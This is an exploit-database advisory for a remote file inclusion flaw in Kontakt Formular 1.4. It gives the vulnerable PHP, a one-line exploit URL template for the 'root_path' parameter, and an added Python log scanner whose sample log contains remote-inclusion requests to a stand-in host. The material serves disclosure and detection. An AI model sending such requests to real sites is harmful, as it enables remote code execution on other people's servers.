Vendor: Kontakt Formular
By: bd0rk
CVSS: 7.5 (HIGH)
Type: Remote File Inclusion
CWE: 98
Product Name: Kontakt Formular
Affected Version From: Not specified
Affected Version To: Not specified
Patch Exists: NO
Related CWE: Not available
CPE: Not specified
Metasploit:
Other Scripts:
Platforms Tested: Not specified
Year: 2007

Kontakt Formular 1.4 Remote File Inclusion Vulnerability

The vulnerability allows a remote attacker to include arbitrary files from a remote server through the 'root_path' parameter of '/includes/function.php', which is passed unsanitized to include_once(). By pointing 'root_path' at a URL under their control, an attacker can execute arbitrary code on the target server.

Mitigation:

The vendor should release a patch that sanitizes this input and prevents remote file inclusion. Until then, users should avoid running the vulnerable version of the software or deploy a web application firewall (WAF) to filter out malicious input.
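As a detection complement to the WAF suggestion above, the following is an added example (not part of this advisory) that scans web server access-log lines for requests to includes/function.php whose root_path parameter carries a URL scheme, which is the signature of this remote file inclusion. The log lines and IP addresses are constructed for the example.

```python
"""Flag Kontakt Formular 'root_path' remote-file-inclusion attempts in access logs."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Combined log format: client IP, request line, status code (rest of the line is ignored).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Schemes that make include_once() load code from outside the local directory tree.
REMOTE_SCHEMES = ("http", "https", "ftp", "ftps", "php", "data", "expect")


def is_rfi_attempt(target: str) -> bool:
    """True if the request targets function.php with a root_path that starts with a scheme."""
    parts = urlsplit(target)
    if not parts.path.endswith("/includes/function.php"):
        return False
    for value in parse_qs(parts.query).get("root_path", []):
        # parse_qs decodes once; decode again so double-encoded values are not missed.
        value = unquote(value).strip().lower()
        if ":" in value and value.split(":", 1)[0] in REMOTE_SCHEMES:
            return True
    return False


def scan_log(lines):
    """Return (ip, target) for every log line that looks like an RFI attempt."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_rfi_attempt(m.group("target")):
            hits.append((m.group("ip"), m.group("target")))
    return hits


# Constructed sample: one benign page view, one plain and one URL-encoded RFI attempt.
SAMPLE_LOG = [
    '203.0.113.5 - - [30/Dec/2007:10:00:00 +0100] "GET /kontakt/index.php HTTP/1.1" 200 512',
    '198.51.100.7 - - [30/Dec/2007:10:00:05 +0100] "GET /kontakt/includes/function.php?root_path=http://203.0.113.99/x.txt? HTTP/1.1" 200 88',
    '198.51.100.7 - - [30/Dec/2007:10:00:09 +0100] "GET /kontakt/includes/function.php?root_path=http%3A%2F%2F203.0.113.99%2Fs.txt HTTP/1.1" 200 88',
]

if __name__ == "__main__":
    for ip, target in scan_log(SAMPLE_LOG):
        print(f"RFI attempt from {ip}: {target}")
```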

Exploit-DB raw data:

                   ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
                   +                                                          +
                   + Kontakt Formular 1.4 Remote File Inclusion Vulnerability +
                   +                                                          +
                   +                  Discovered by bd0rk                     +
                   +                                                          +
                   ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



Vendor: http://www.mapos-scripts.de

Download: http://www.mapos-scripts.de/download,5.html

Vulnerable Code in /includes/function.php

-------------------------------------------------------------------

<?php
@session_start();

// $root_path is never initialised in this file; with register_globals enabled
// PHP populates it straight from the request, so it is attacker-controlled.
$datei_path = $datei_path ? $datei_path : $root_path."/index.php";
$datei_path = htmlentities($datei_path);   // only $datei_path is escaped, $root_path is not
$kontakt_config=array();
include_once($root_path.'/includes/config.php');   // becomes a remote include when $root_path is a URL

-------------------------------------------------------------------

[+]Exploit: http://[target]/[path]/includes/function.php?root_path=[Shellcode]


Greetings: str0ke, TheJT, Luna-Tic, DNX


####The 19-year-old German hacker bd0rk####

Contact: bd0rk[at]hackermail.com

# milw0rm.com [2007-12-30]